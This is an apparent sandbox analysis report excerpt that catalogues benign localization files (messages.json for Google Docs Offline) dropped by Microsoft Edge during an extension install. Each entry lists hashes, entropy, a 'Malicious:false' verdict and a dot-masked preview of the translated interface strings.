                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1065
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                                        MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                                        SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                                        SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                                        SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2771
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                                        MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                                        SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                                        SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                                        SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):858
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                                        MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                                        SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                                        SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                                        SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):954
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                                        MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                                        SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                                        SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                                        SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):899
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                                        MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                                        SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                                        SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                                        SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2230
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                                        MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                                        SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                                        SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                                        SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1160
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                                        MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                                        SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                                        SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                                        SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):3264
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                                        MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                                        SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                                        SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                                        SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):3235
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                                        MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                                        SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                                        SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                                        SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):3122
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                                        MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                                        SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                                        SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                                        SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1895
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                                        MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                                        SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                                        SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                                        SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1042
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                                        MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                                        SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                                        SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                                        SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                                        Malicious:false
